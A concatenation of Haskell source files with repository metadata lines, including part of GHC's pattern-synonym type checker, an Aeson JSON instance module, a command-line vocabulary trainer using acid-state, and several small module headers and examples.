; let ex_tys = substTys subst $ map mkTyVarTy ex_tvs
prov_theta' = substTheta subst prov_theta
; wrapped_args <- forM (zipEqual "tcCheckPatSynDecl" arg_names arg_tys) $ \(arg_name, arg_ty) -> do
{ arg <- tcLookupId arg_name
; let arg_ty' = substTy subst arg_ty
; coi <- unifyType (varType arg) arg_ty'
; return (setVarType arg arg_ty, coToHsWrapper coi) }
; return (ex_tys, prov_theta', wrapped_args) }
; (ex_vars_rhs, prov_dicts_rhs) <- tcCollectEx lpat'
; let ex_tvs_rhs = varSetElems ex_vars_rhs
-- Check that prov_theta' can be satisfied with the dicts from the pattern
; (implic2, prov_ev_binds, prov_dicts) <-
buildImplication skol_info ex_tvs_rhs prov_dicts_rhs $ do
{ let origin = PatOrigin -- TODO
; emitWanteds origin prov_theta' }
-- Solve the constraints now, because we are about to make a PatSyn,
-- which should not contain unification variables and the like (Trac #10997)
-- Since all the inputs are implications the returned bindings will be empty
; _ <- simplifyTop (emptyWC `addImplics` (implic1 `unionBags` implic2))
; traceTc "tcCheckPatSynDecl }" $ ppr name
; tc_patsyn_finish lname dir is_infix lpat'
(univ_tvs, req_theta, req_ev_binds, req_dicts)
(ex_tvs, ex_tys, prov_theta, prov_ev_binds, prov_dicts)
wrapped_args
pat_ty rec_fields }
where
(arg_tys, pat_ty) = tcSplitFunTys tau
collectPatSynArgInfo :: HsPatSynDetails (Located Name) -> ([Name], [Name], Bool)
collectPatSynArgInfo details =
case details of
PrefixPatSyn names -> (map unLoc names, [], False)
InfixPatSyn name1 name2 -> (map unLoc [name1, name2], [], True)
RecordPatSyn names ->
let (vars, sels) = unzip (map splitRecordPatSyn names)
in (vars, sels, False)
where
splitRecordPatSyn :: RecordPatSynField (Located Name) -> (Name, Name)
splitRecordPatSyn (RecordPatSynField { recordPatSynPatVar = L _ patVar
, recordPatSynSelectorId = L _ selId })
= (patVar, selId)
wrongNumberOfParmsErr :: Arity -> SDoc
wrongNumberOfParmsErr ty_arity
= ptext (sLit "Number of pattern synonym arguments doesn't match type; expected")
<+> ppr ty_arity
-------------------------
-- Shared by both tcInferPatSyn and tcCheckPatSyn
tc_patsyn_finish :: Located Name -- ^ PatSyn Name
-> HsPatSynDir Name -- ^ PatSyn type (Uni/Bidir/ExplicitBidir)
-> Bool -- ^ Whether infix
-> LPat Id -- ^ Pattern of the PatSyn
-> ([TcTyVar], [PredType], TcEvBinds, [EvVar])
-> ([TcTyVar], [TcType], [PredType], TcEvBinds, [EvVar])
-> [(Var, HsWrapper)] -- ^ Pattern arguments
-> TcType -- ^ Pattern type
-> [Name] -- ^ Selector names
-- ^ Whether fields, empty if not record PatSyn
-> TcM (PatSyn, LHsBinds Id, TcGblEnv)
tc_patsyn_finish lname dir is_infix lpat'
(univ_tvs, req_theta, req_ev_binds, req_dicts)
(ex_tvs, subst, prov_theta, prov_ev_binds, prov_dicts)
wrapped_args
pat_ty field_labels
= do { -- Zonk everything. We are about to build a final PatSyn
-- so there had better be no unification variables in there
univ_tvs <- mapM zonkQuantifiedTyVar univ_tvs
; ex_tvs <- mapM zonkQuantifiedTyVar ex_tvs
; prov_theta <- zonkTcThetaType prov_theta
; req_theta <- zonkTcThetaType req_theta
; pat_ty <- zonkTcType pat_ty
; wrapped_args <- mapM zonk_wrapped_arg wrapped_args
; let qtvs = univ_tvs ++ ex_tvs
-- See Note [Record PatSyn Desugaring]
theta = prov_theta ++ req_theta
arg_tys = map (varType . fst) wrapped_args
; (patSyn, matcher_bind) <- fixM $ \ ~(patSyn,_) -> do {
traceTc "tc_patsyn_finish {" $
ppr (unLoc lname) $$ ppr (unLoc lpat') $$
ppr (univ_tvs, req_theta, req_ev_binds, req_dicts) $$
ppr (ex_tvs, subst, prov_theta, prov_ev_binds, prov_dicts) $$
ppr wrapped_args $$
ppr pat_ty
-- Make the 'matcher'
; (matcher_id, matcher_bind) <- tcPatSynMatcher lname lpat'
(univ_tvs, req_theta, req_ev_binds, req_dicts)
(ex_tvs, subst, prov_theta, prov_ev_binds, prov_dicts)
wrapped_args -- Not necessarily zonked
pat_ty
-- Make the 'builder'
; builder_id <- mkPatSynBuilderId dir lname qtvs theta
arg_tys pat_ty patSyn
-- TODO: Make this have the proper information
; let mkFieldLabel name = FieldLabel (occNameFS (nameOccName name)) False name
field_labels' = (map mkFieldLabel field_labels)
-- Make the PatSyn itself
; let patSyn' = mkPatSyn (unLoc lname) is_infix
(univ_tvs, req_theta)
(ex_tvs, prov_theta)
arg_tys
pat_ty
matcher_id builder_id
field_labels'
; return (patSyn', matcher_bind) }
-- Selectors
; let (sigs, selector_binds) =
unzip (mkPatSynRecSelBinds patSyn (patSynFieldLabels patSyn))
; let tything = AConLike (PatSynCon patSyn)
; tcg_env <-
tcExtendGlobalEnv [tything] $
tcRecSelBinds
(ValBindsOut (zip (repeat NonRecursive) selector_binds) sigs)
; return (patSyn, matcher_bind, tcg_env) }
where
zonk_wrapped_arg :: (Var, HsWrapper) -> TcM (Var, HsWrapper)
-- The HsWrapper will get zonked later, as part of the LHsBinds
zonk_wrapped_arg (arg_id, wrap) = do { arg_id <- zonkId arg_id
; return (arg_id, wrap) }
{-
************************************************************************
* *
Constructing the "matcher" Id and its binding
* *
************************************************************************
-}
tcPatSynMatcher :: Located Name
-> LPat Id
-> ([TcTyVar], ThetaType, TcEvBinds, [EvVar])
-> ([TcTyVar], [TcType], ThetaType, TcEvBinds, [EvVar])
-> [(Var, HsWrapper)]
-> TcType
-> TcM ((Id, Bool), LHsBinds Id)
-- See Note [Matchers and builders for pattern synonyms] in PatSyn
tcPatSynMatcher (L loc name) lpat
(univ_tvs, req_theta, req_ev_binds, req_dicts)
(ex_tvs, ex_tys, prov_theta, prov_ev_binds, prov_dicts)
wrapped_args pat_ty
= do { uniq <- newUnique
; let tv_name = mkInternalName uniq (mkTyVarOcc "r") loc
res_tv = mkTcTyVar tv_name openTypeKind (SkolemTv False)
is_unlifted = null wrapped_args && null prov_dicts
res_ty = mkTyVarTy res_tv
(cont_arg_tys, cont_args)
| is_unlifted = ([voidPrimTy], [nlHsVar voidPrimId])
| otherwise = unzip [ (varType arg, mkLHsWrap wrap $ nlHsVar arg)
| (arg, wrap) <- wrapped_args
]
cont_ty = mkSigmaTy ex_tvs prov_theta $
mkFunTys cont_arg_tys res_ty
fail_ty = mkFunTy voidPrimTy res_ty
; matcher_name <- newImplicitBinder name mkMatcherOcc
; scrutinee <- newSysLocalId (fsLit "scrut") pat_ty
; cont <- newSysLocalId (fsLit "cont") cont_ty
; fail <- newSysLocalId (fsLit "fail") fail_ty
; let matcher_tau = mkFunTys [pat_ty, cont_ty, fail_ty] res_ty
matcher_sigma = mkSigmaTy (res_tv:univ_tvs) req_theta matcher_tau
matcher_id = mkExportedLocalId PatSynId matcher_name matcher_sigma
-- See Note [Exported LocalIds] in Id
cont_dicts = map nlHsVar prov_dicts
cont' = mkLHsWrap (mkWpLet prov_ev_binds) $
nlHsTyApps cont ex_tys (cont_dicts ++ cont_args)
fail' = nlHsApps fail [nlHsVar voidPrimId]
args = map nlVarPat [scrutinee, cont, fail]
lwpat = noLoc $ WildPat pat_ty
cases = if isIrrefutableHsPat lpat
then [mkSimpleHsAlt lpat cont']
else [mkSimpleHsAlt lpat cont',
mkSimpleHsAlt lwpat fail']
body = mkLHsWrap (mkWpLet req_ev_binds) $
L (getLoc lpat) $
HsCase (nlHsVar scrutinee) $
MG{ mg_alts = cases
, mg_arg_tys = [pat_ty]
, mg_res_ty = res_ty
, mg_origin = Generated
}
body' = noLoc $
HsLam $
MG{ mg_alts = [mkSimpleMatch args body]
, mg_arg_tys = [pat_ty, cont_ty, res_ty]
, mg_res_ty = res_ty
, mg_origin = Generated
}
match = mkMatch [] (mkHsLams (res_tv:univ_tvs) req_dicts body') EmptyLocalBinds
mg = MG{ mg_alts = [match]
, mg_arg_tys = []
, mg_res_ty = res_ty
, mg_origin = Generated
}
; let bind = FunBind{ fun_id = L loc matcher_id
, fun_infix = False
, fun_matches = mg
, fun_co_fn = idHsWrapper
, bind_fvs = emptyNameSet
, fun_tick = [] }
matcher_bind = unitBag (noLoc bind)
; traceTc "tcPatSynMatcher" (ppr name $$ ppr (idType matcher_id))
; traceTc "tcPatSynMatcher" (ppr matcher_bind)
; return ((matcher_id, is_unlifted), matcher_bind) }
mkPatSynRecSelBinds :: PatSyn
-> [FieldLabel]
-- ^ Visible field labels
-> [(LSig Name, LHsBinds Name)]
mkPatSynRecSelBinds ps fields = map mkRecSel fields
where
mkRecSel fld_lbl =
case mkOneRecordSelector [PatSynCon ps] (RecSelPatSyn ps) fld_lbl of
(name, (_rec_flag, binds)) -> (name, binds)
isUnidirectional :: HsPatSynDir a -> Bool
isUnidirectional Unidirectional = True
isUnidirectional ImplicitBidirectional = False
isUnidirectional ExplicitBidirectional{} = False
{-
************************************************************************
* *
Constructing the "builder" Id
* *
************************************************************************
-}
mkPatSynBuilderId :: HsPatSynDir a -> Located Name
-> [TyVar] -> ThetaType -> [Type] -> Type -> PatSyn
-> TcM (Maybe (Id, Bool))
mkPatSynBuilderId dir (L _ name) qtvs theta arg_tys pat_ty pat_syn
| isUnidirectional dir
= return Nothing
| otherwise
= do { builder_name <- newImplicitBinder name mkBuilderOcc
; let builder_sigma = mkSigmaTy qtvs theta (mkFunTys builder_arg_tys pat_ty)
builder_id =
-- See Note [Exported LocalIds] in Id
mkExportedLocalId (PatSynBuilderId pat_syn)
builder_name builder_sigma
; return (Just (builder_id, need_dummy_arg)) }
where
builder_arg_tys | need_dummy_arg = [voidPrimTy]
| otherwise = arg_tys
need_dummy_arg = isUnLiftedType pat_ty && null arg_tys && null theta
tcPatSynBuilderBind :: PatSynBind Name Name
-> TcM (LHsBinds Id)
-- See Note [Matchers and builders for pattern synonyms] in PatSyn
tcPatSynBuilderBind PSB{ psb_id = L loc name, psb_def = lpat
, psb_dir = dir, psb_args = details }
| isUnidirectional dir
= return emptyBag
| isNothing mb_match_group -- Can't invert the pattern
= setSrcSpan (getLoc lpat) $ failWithTc $
hang (ptext (sLit "Right-hand side of bidirectional pattern synonym cannot be used as an expression"))
2 (ppr lpat)
| otherwise -- Bidirectional
= do { patsyn <- tcLookupPatSyn name
; let Just (builder_id, need_dummy_arg) = patSynBuilder patsyn
-- Bidirectional, so patSynBuilder returns Just
match_group' | need_dummy_arg = add_dummy_arg match_group
| otherwise = match_group
bind = FunBind { fun_id = L loc (idName builder_id)
, fun_infix = False
, fun_matches = match_group'
, fun_co_fn = idHsWrapper
, bind_fvs = placeHolderNamesTc
, fun_tick = [] }
; sig <- instTcTySigFromId builder_id
-- See Note [Redundant constraints for builder]
; (builder_binds, _) <- tcPolyCheck NonRecursive emptyPragEnv sig (noLoc bind)
; traceTc "tcPatSynBuilderBind }" $ ppr builder_binds
; return builder_binds }
where
Just match_group = mb_match_group
mb_match_group
= case dir of
Unidirectional -> Nothing
ExplicitBidirectional explicit_mg -> Just explicit_mg
ImplicitBidirectional -> fmap mk_mg (tcPatToExpr args lpat)
mk_mg :: LHsExpr Name -> MatchGroup Name (LHsExpr Name)
mk_mg body = mkMatchGroupName Generated [builder_match]
where
builder_args = [L loc (VarPat n) | L loc n <- args]
builder_match = mkMatch builder_args body EmptyLocalBinds
args = case details of
PrefixPatSyn args -> args
InfixPatSyn arg1 arg2 -> [arg1, arg2]
RecordPatSyn args -> map recordPatSynPatVar args
add_dummy_arg :: MatchGroup Name (LHsExpr Name) -> MatchGroup Name (LHsExpr Name)
add_dummy_arg mg@(MG { mg_alts = [L loc (Match Nothing [] ty grhss)] })
= mg { mg_alts = [L loc (Match Nothing [nlWildPatName] ty grhss)] }
add_dummy_arg other_mg = pprPanic "add_dummy_arg" $
pprMatches (PatSyn :: HsMatchContext Name) other_mg
tcPatSynBuilderOcc :: CtOrigin -> PatSyn -> TcM (HsExpr TcId, TcRhoType)
-- The result type should be fully instantiated
tcPatSynBuilderOcc orig ps
| Just (builder_id, add_void_arg) <- builder
= do { (wrap, rho) <- deeplyInstantiate orig (idType builder_id)
; let inst_fun = mkHsWrap wrap (HsVar builder_id)
; if add_void_arg
then return ( HsApp (noLoc inst_fun) (nlHsVar voidPrimId)
, tcFunResultTy rho )
else return ( inst_fun, rho ) }
| otherwise -- Unidirectional
= nonBidirectionalErr name
where
name = patSynName ps
builder = patSynBuilder ps
{-
Note [Redundant constraints for builder]
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
The builder can have redundant constraints, which are awkard to eliminate.
Consider
pattern P = Just 34
To match against this pattern we need (Eq a, Num a). But to build
(Just 34) we need only (Num a). Fortunately instTcSigFromId sets
sig_warn_redundant to False.
************************************************************************
* *
Helper functions
* *
************************************************************************
Note [As-patterns in pattern synonym definitions]
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
The rationale for rejecting as-patterns in pattern synonym definitions
is that an as-pattern would introduce nonindependent pattern synonym
arguments, e.g. given a pattern synonym like:
pattern K x y = x@(Just y)
one could write a nonsensical function like
f (K Nothing x) = ...
or
g (K (Just True) False) = ...
Note [Type signatures and the builder expression]
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Consider
pattern L x = Left x :: Either [a] [b]
In tc{Infer/Check}PatSynDecl we will check that the pattern has the
specified type. We check the pattern *as a pattern*, so the type
signature is a pattern signature, and so brings 'a' and 'b' into
scope. But we don't have a way to bind 'a, b' in the LHS, as we do
'x', say. Nevertheless, the sigature may be useful to constrain
the type.
When making the binding for the *builder*, though, we don't want
$buildL x = Left x :: Either [a] [b]
because that wil either mean (forall a b. Either [a] [b]), or we'll
get a complaint that 'a' and 'b' are out of scope. (Actually the
latter; Trac #9867.) No, the job of the signature is done, so when
converting the pattern to an expression (for the builder RHS) we
simply discard the signature.
Note [Record PatSyn Desugaring]
-------------------------------
It is important that prov_theta comes before req_theta as this ordering is used
when desugaring record pattern synonym updates.
Any change to this ordering should make sure to change deSugar/DsExpr.hs if you
want to avoid difficult to decipher core lint errors!
-}
tcCheckPatSynPat :: LPat Name -> TcM ()
tcCheckPatSynPat = go
where
go :: LPat Name -> TcM ()
go = addLocM go1
go1 :: Pat Name -> TcM ()
go1 (ConPatIn _ info) = mapM_ go (hsConPatArgs info)
go1 VarPat{} = return ()
go1 WildPat{} = return ()
go1 p@(AsPat _ _) = asPatInPatSynErr p
go1 (LazyPat pat) = go pat
go1 (ParPat pat) = go pat
go1 (BangPat pat) = go pat
go1 (PArrPat pats _) = mapM_ go pats
go1 (ListPat pats _ _) = mapM_ go pats
go1 (TuplePat pats _ _) = mapM_ go pats
go1 LitPat{} = return ()
go1 NPat{} = return ()
go1 (SigPatIn pat _) = go pat
go1 (ViewPat _ pat _) = go pat
go1 p@SplicePat{} = thInPatSynErr p
go1 p@NPlusKPat{} = nPlusKPatInPatSynErr p
go1 ConPatOut{} = panic "ConPatOut in output of renamer"
go1 SigPatOut{} = panic "SigPatOut in output of renamer"
go1 CoPat{} = panic "CoPat in output of renamer"
asPatInPatSynErr :: OutputableBndr name => Pat name -> TcM a
asPatInPatSynErr pat
= failWithTc $
hang (ptext (sLit "Pattern synonym definition cannot contain as-patterns (@):"))
2 (ppr pat)
thInPatSynErr :: OutputableBndr name => Pat name -> TcM a
thInPatSynErr pat
= failWithTc $
hang (ptext (sLit "Pattern synonym definition cannot contain Template Haskell:"))
2 (ppr pat)
nPlusKPatInPatSynErr :: OutputableBndr name => Pat name -> TcM a
nPlusKPatInPatSynErr pat
= failWithTc $
hang (ptext (sLit "Pattern synonym definition cannot contain n+k-pattern:"))
2 (ppr pat)
nonBidirectionalErr :: Outputable name => name -> TcM a
nonBidirectionalErr name = failWithTc $
ptext (sLit "non-bidirectional pattern synonym")
<+> quotes (ppr name) <+> ptext (sLit "used in an expression")
tcPatToExpr :: [Located Name] -> LPat Name -> Maybe (LHsExpr Name)
tcPatToExpr args = go
where
lhsVars = mkNameSet (map unLoc args)
go :: LPat Name -> Maybe (LHsExpr Name)
go (L loc (ConPatIn (L _ con) info))
= do { exprs <- mapM go (hsConPatArgs info)
; return $ L loc $
foldl (\x y -> HsApp (L loc x) y) (HsVar con) exprs }
go (L _ (SigPatIn pat _)) = go pat
-- See Note [Type signatures and the builder expression]
go (L loc p) = fmap (L loc) $ go1 p
go1 :: Pat Name -> Maybe (HsExpr Name)
go1 (VarPat var)
| var `elemNameSet` lhsVars = return $ HsVar var
| otherwise = Nothing
go1 (LazyPat pat) = fmap HsPar $ go pat
go1 (ParPat pat) = fmap HsPar $ go pat
go1 (BangPat pat) = fmap HsPar $ go pat
go1 (PArrPat pats ptt) = do { exprs <- mapM go pats
; return $ ExplicitPArr ptt exprs }
go1 (ListPat pats ptt reb) = do { exprs <- mapM go pats
; return $ ExplicitList ptt (fmap snd reb) exprs }
go1 (TuplePat pats box _) = do { exprs <- mapM go pats
; return $ ExplicitTuple
(map (noLoc . Present) exprs) box }
go1 (LitPat lit) = return $ HsLit lit
go1 (NPat (L _ n) Nothing _) = return $ HsOverLit n
go1 (NPat (L _ n) (Just neg) _) = return $ noLoc neg `HsApp` noLoc (HsOverLit n)
go1 (ConPatOut{}) = panic "ConPatOut in output of renamer"
go1 (SigPatOut{}) = panic "SigPatOut in output of renamer"
go1 (CoPat{}) = panic "CoPat in output of renamer"
go1 _ = Nothing
-- Walk the whole pattern and for all ConPatOuts, collect the
-- existentially-bound type variables and evidence binding variables.
--
-- These are used in computing the type of a pattern synonym and also
-- in generating matcher functions, since success continuations need
-- to be passed these pattern-bound evidences.
tcCollectEx :: LPat Id -> TcM (TyVarSet, [EvVar])
tcCollectEx = return . go
where
go :: LPat Id -> (TyVarSet, [EvVar])
go = go1 . unLoc
go1 :: Pat Id -> (TyVarSet, [EvVar])
go1 (LazyPat p) = go p
go1 (AsPat _ p) = go p
go1 (ParPat p) = go p
go1 (BangPat p) = go p
go1 (ListPat ps _ _) = mconcat . map go $ ps
go1 (TuplePat ps _ _) = mconcat . map go $ ps
go1 (PArrPat ps _) = mconcat . map go $ ps
go1 (ViewPat _ p _) = go p
go1 con@ConPatOut{} = mappend (mkVarSet (pat_tvs con), pat_dicts con) $
goConDetails $ pat_args con
go1 (SigPatOut p _) = go p
go1 (CoPat _ p _) = go1 p
go1 (NPlusKPat n k geq subtract)
= pprPanic "TODO: NPlusKPat" $ ppr n $$ ppr k $$ ppr geq $$ ppr subtract
go1 _ = mempty
goConDetails :: HsConPatDetails Id -> (TyVarSet, [EvVar])
goConDetails (PrefixCon ps) = mconcat . map go $ ps
goConDetails (InfixCon p1 p2) = go p1 `mappend` go p2
goConDetails (RecCon HsRecFields{ rec_flds = flds })
= mconcat . map goRecFd $ flds
goRecFd :: LHsRecField Id (LPat Id) -> (TyVarSet, [EvVar])
goRecFd (L _ HsRecField{ hsRecFieldArg = p }) = go p
| AlexanderPankiv/ghc | compiler/typecheck/TcPatSyn.hs | bsd-3-clause | 28,128 | 0 | 20 | 9,447 | 6,490 | 3,375 | 3,115 | 444 | 19 |
{-# LANGUAGE OverloadedStrings #-}
-- | This just defines Token and TokenType as instances of ToJSON.
module Text.Bakers12.Tokenizer.JSON
() where
import Data.Aeson (ToJSON(..), object, (.=))
import Text.Bakers12.Tokenizer.Types (Token(..), TokenType(..))
instance ToJSON Token where
toJSON (Token text raw len typ src offs) =
object [ "text" .= text
, "raw" .= raw
, "length" .= len
, "type" .= typ
, "source" .= src
, "offset" .= offs
]
instance ToJSON TokenType where
toJSON = toJSON . show
| erochest/bakers12 | lib/Text/Bakers12/Tokenizer/JSON.hs | bsd-3-clause | 617 | 0 | 8 | 200 | 152 | 91 | 61 | 15 | 0 |
-- How to String the Wreath Lamps
-- ==============================
--
-- See the comments in `Walk.lhs`.
--
-- Run the program with `dist/build/lampWalk/lampWalk -o lampWalk.svg -w 400`
-- where `-o` sets the output filename, and `-w` sets the diagram width.
import Wreath.Walk (lampWalkMain)
main = lampWalkMain
| bobgru/wreath | examples/lampWalk.hs | bsd-3-clause | 319 | 0 | 5 | 51 | 23 | 16 | 7 | 2 | 1 |
module Main (main) where
import VocabularyData
import Database
import FreqTable
import Trainer
import Control.Exception (bracket)
import Control.Lens
import Control.Monad.Trans.State
import Data.Acid
import Data.Maybe (listToMaybe)
import Data.Char (toUpper)
import System.Exit (exitSuccess)
import System.IO (hFlush, stdout)
main :: IO ()
main = do
showHeadline
let test = initTestState
lang <- getSourceOrTarget "from"
test' <- execStateT (source.=lang) test
lang' <- getSourceOrTarget "to"
test'' <- execStateT (target.=lang') test'
bracket (openLocalState emptyLearntList)
(closeAcidState)
(\db -> command db test'')
command :: AcidState LearntList -> TestState -> IO ()
command db test = do putStrLn "+===================================================+"
putStrLn "| |"
putStrLn "| what to do next? (type: \"help\" for help screen) |"
putStrLn "| \"enter\" asks for the next vocabulary. |"
putStrLn "| |"
putStrLn "+===================================================+\n"
cmd <- getLine
control db test cmd
control :: AcidState LearntList -> TestState -> String -> IO ()
control db test "" = control db test "next"
control db test "help" = do print_help
command db test
control db test "next" = do len <- query db LengthVocabulary
if (len <=0)
then do putStrLn "No vocabulary in list."
putStrLn "Use \"add word\" to insert."
command db test
else do idx <- randomListIndex (fromIntegral len)
f <- query db (LookupFrequency idx)
test' <- execStateT (currentWord.=freqTable!!(f-1)) test
-- putStrLn $ "vocabulary list len: "++show len -- _ _ _ _ --
-- putStrLn $ "random index: "++show idx -- | \ |_ |_⟩ | | | _ --
-- putStrLn $ "frequency to the index: "++show -- |_/ |_ |_⟩ |_| |_| --
-- print test' -- --
guess db test'
control db test "change source" = do lang <- getSourceOrTarget "from"
test' <- execStateT (source.=lang) test
-- print test'
command db test'
control db test "change target" = do lang <- getSourceOrTarget "to"
test' <- execStateT (target.=lang) test
-- print test'
command db test'
control db test ('a':'d':'d':' ':'w':'o':'r':'d':xs) =
do let times = maybeRead xs :: Maybe Int
_repeat db test times
control db test "clear all" = do putStrLn "Are you sure to delete all learnt vocabularies?"
putStrLn "Type \"yes\" or \"no\" to confirm."
yesNo <- getLine
yesNoElse db test yesNo
control db _ "exit" = do closeAcidState db
exitSuccess
control db test "print db" = do frqKnowList <- query db ViewAllVocabulary
print frqKnowList
command db test
control db test _ = do putStrLn "Invalid Input"
command db test
guess :: AcidState LearntList -> TestState -> IO ()
guess db test = do putStr $ "What is ("++show (test^.source)++"): "
putStrLn $ vocab (test^.currentWord) (test^.source)
putStr $ "Your answer ("++show (test^.target)++") is: "
hFlush stdout
answer <- getLine
let is_hinted = (test^.hinted)
is_correct = correct (test^.currentWord) (test^.target) answer
f = test^.currentWord.frq
if is_hinted
then if is_correct
then do _ <- update db (UpdateKnowledge f 3)
putStrLn "Correct, +3 Knowledge!"
putStr "Full Answer: "
putStrLn (vocab (test^.currentWord) (test^.target))
putStr "Translated Hint: "
putStrLn (hint (test^.currentWord) (test^.target))
test' <- execStateT (hinted.=False) test
command db test'
else do _ <- update db (UpdateKnowledge f (-2))
putStrLn "Wrong, -2 Knowledge!"
putStr "Correct Answer: "
putStrLn (vocab (test^.currentWord) (test^.target))
putStr "Translated Hint: "
putStrLn (hint (test^.currentWord) (test^.target))
test' <- execStateT (hinted.=False) test
command db test'
else if is_correct
then do _ <- update db (UpdateKnowledge f 5)
putStrLn "Correct, +5 Knowledge!"
putStr "Full Answer: "
putStrLn (vocab (test^.currentWord) (test^.target))
command db test
else do test' <- execStateT (hinted.=True) test
putStr "Hint: "
putStrLn (hint (test'^.currentWord) (test'^.source))
guess db test'
_repeat :: AcidState LearntList -> TestState -> Maybe Int -> IO ()
_repeat db test (Just n)| n<=0 = command db test
| otherwise = do _ <- update db AddVocabulary
_repeat db test (Just (n-1))
_repeat db test Nothing = do _ <- update db AddVocabulary
command db test
yesNoElse :: AcidState LearntList -> TestState -> String -> IO ()
yesNoElse db test "yes" = do _ <- update db ClearVocabulary;command db test
yesNoElse db test "no" = command db test
yesNoElse db test _ = control db test "clear all"
print_help :: IO ()
print_help = do putStrLn ""
putStr "| |_| |" ; putStrLn "help -> prints this text"
putStr "| | | |" ; putStrLn ""
putStr "| _ |" ; putStrLn "next -> next random vocabulary"
putStr "| |_ |" ; putStrLn "add word -> adds a new vocabulary to the list of learnt words"
putStr "| |_ |" ; putStrLn "clear all -> clears all vocabulary from the list of learnt words"
putStr "| |" ; putStrLn ""
putStr "| | |" ; putStrLn "change source -> changes the source language"
putStr "| |_ |" ; putStrLn "change target -> changes the target language"
putStr "| _ |" ; putStrLn ""
putStr "| |_| |" ; putStrLn "print db -> prints the database"
putStr "| | |" ; putStrLn "exit -> guess what \"exits the program\""
-- putStrLn "print test -> prints the current test"
initTestState :: TestState
initTestState = TestState { _currentWord = freqTable!!0
, _source = F
, _target = D
, _hinted = False }
langOptions :: IO ()
langOptions = do putStrLn "\tF/f for Français/French/Französisch"
putStrLn "\tD/d for Allemande/German/Deutsch"
putStrLn "\tE/e for Anglais/English/Englisch"
getSourceOrTarget :: String -> IO Language
getSourceOrTarget toOrFrom = do
putStrLn $ "Which language do you want to translate "++toOrFrom++"?"
langOptions
lang <- getLine
case (maybeRead . map toUpper . take 1) lang of Just l -> return l
Nothing -> do putStrLn "Invalid Input"
getSourceOrTarget toOrFrom
maybeRead :: Read a => String -> Maybe a
maybeRead = fmap fst . listToMaybe . reads
hint :: Word -> Language -> String
hint w F = w^.phrase
hint w D = w^.satz
hint w E = w^.sentence
vocab :: Word-> Language -> String
vocab w F = w^.fra
vocab w D = w^.deu
vocab w E = w^.eng
correct :: Word-> Language -> String -> Bool
correct w F str = elem str $ (subst2 . words . subst) (w^.fra)
correct w D str = elem str $ (subst2 . words . subst) (w^.deu)
correct w E str = elem str $ (subst2 . words . subst) (w^.eng)
subst ::String -> String
subst = map subst_
where subst_ :: Char -> Char
subst_ ';' = ' '
subst_ '.' = ' '
subst_ ',' = ' '
subst_ '/' = ' '
subst_ a = a
subst2 :: [String] -> [String]
subst2 = map (map subst_)
where subst_ :: Char -> Char
subst_ '_' = ' '
subst_ a = a
showHeadline :: IO ()
showHeadline = do
putStrLn "_ __ ____ ___ __ ____ __ _"
putStrLn "\\\\ / / / _ \\ / _ / \\ | \\ || //"
putStrLn " \\\\ / / / / \\ \\ / / / /\\ \\ | [] / || //"
putStrLn " \\\\ / / / / \\ \\/ / / /__\\ \\| \\ || //"
putStrLn " \\\\/ / \\ \\___/ /\\ \\_ / / / /| [] \\ ||__//"
putStrLn " \\_/ \\_______/ \\___ /_/ /_/ |_____/ |___/ "
putStrLn " __ __ ____ ____ _____ __"
putStrLn " \\\\\\ / \\ \\ \\ __ | \\ | __ \\ / \\"
putStrLn " \\\\\\ / /\\ \\ \\ _\\/_ \\ | [] / | | \\ \\ / /\\ \\"
putStrLn " //\\\\ / /__\\ \\ \\ \\\\/ \\ \\ | \\ | | / / / /__\\ \\"
putStrLn " // \\\\ \\ \\ \\ \\ \\ \\ \\ \\ | [] \\ | |_/ / / / / /"
putStrLn " // \\\\ \\_\\ \\_\\ \\_\\ \\_\\|_____/ |____/ /_/ /_/"
putStrLn ""
| epsilonhalbe/VocabuLambda | Main.hs | bsd-3-clause | 10,889 | 0 | 16 | 4,909 | 2,444 | 1,146 | 1,298 | -1 | -1 |
-- |
-- Module: WildBind
-- Description: WildBind main module
-- Maintainer: Toshio Ito <debug.ito@gmail.com>
--
--
module WildBind
( module WildBind.Binding,
-- | Defines 'Binding' and many functions to build it.
module WildBind.FrontEnd,
-- | Defines 'FrontEnd', an interface between 'Binding' and a
-- desktop environment.
module WildBind.Exec,
-- | Defines functions to combine 'Binding' and 'FrontEnd'
-- into an executable action. You can customize its behavior
-- via 'Option'.
module WildBind.Description,
-- | Defines 'ActionDescription'.
module WildBind.Input.NumPad
-- | Defines input symbol types for number pad keys.
-- * Support modules
--
--
-- | The following modules are not re-exported from this module.
--
-- - "WildBind.Seq": support module to build a binding to key
-- sequences. /Since: 0.1.1.0/
) where
import WildBind.Description
import WildBind.Binding
import WildBind.FrontEnd
import WildBind.Exec
import WildBind.Input.NumPad
| debug-ito/wild-bind | wild-bind/src/WildBind.hs | bsd-3-clause | 1,113 | 0 | 5 | 294 | 84 | 62 | 22 | 11 | 0 |
{-# LANGUAGE TypeFamilies #-}
{-# LANGUAGE FlexibleContexts #-}
module Control.CP.MonadicCpProblems where
import Control.CP.FD.Interface
import ADP.Multi.Constraint.MonadicCpHelper
main :: IO ()
main = print $ solveModel model
-- throws Exception: Cannot process EGBoolValue BoolConst True
model :: FDModel
model = exists $ \col -> do
[len1,len2] <- colList col 2
xsum col @= 2
len1 @>= 0
len2 @>= 1
2 @<= 1 -- this causes the exception
return col
-- throws Exception: Cannot process EGLess True
model2 :: FDModel
model2 = exists $ \col -> do
[x1,x2,x3,x4] <- colList col 4
allin col (cte 0,cte 5)
x1 @<= x2
x3 @>= x4
x3 @>= x2 @|| x4 @<= x1 -- this causes the exception
return col
| adp-multi/adp-multi-monadiccp | tests/Control/CP/MonadicCpProblems.hs | bsd-3-clause | 715 | 0 | 11 | 148 | 221 | 115 | 106 | 23 | 1 |
{-# LINE 1 "GHC.IO.Handle.Text.hs" #-}
{-# LANGUAGE Trustworthy #-}
{-# LANGUAGE CPP
, NoImplicitPrelude
, RecordWildCards
, BangPatterns
, NondecreasingIndentation
, MagicHash
#-}
{-# OPTIONS_GHC -Wno-name-shadowing #-}
{-# OPTIONS_GHC -Wno-unused-matches #-}
{-# OPTIONS_HADDOCK hide #-}
-----------------------------------------------------------------------------
-- |
-- Module : GHC.IO.Text
-- Copyright : (c) The University of Glasgow, 1992-2008
-- License : see libraries/base/LICENSE
--
-- Maintainer : libraries@haskell.org
-- Stability : internal
-- Portability : non-portable
--
-- String I\/O functions
--
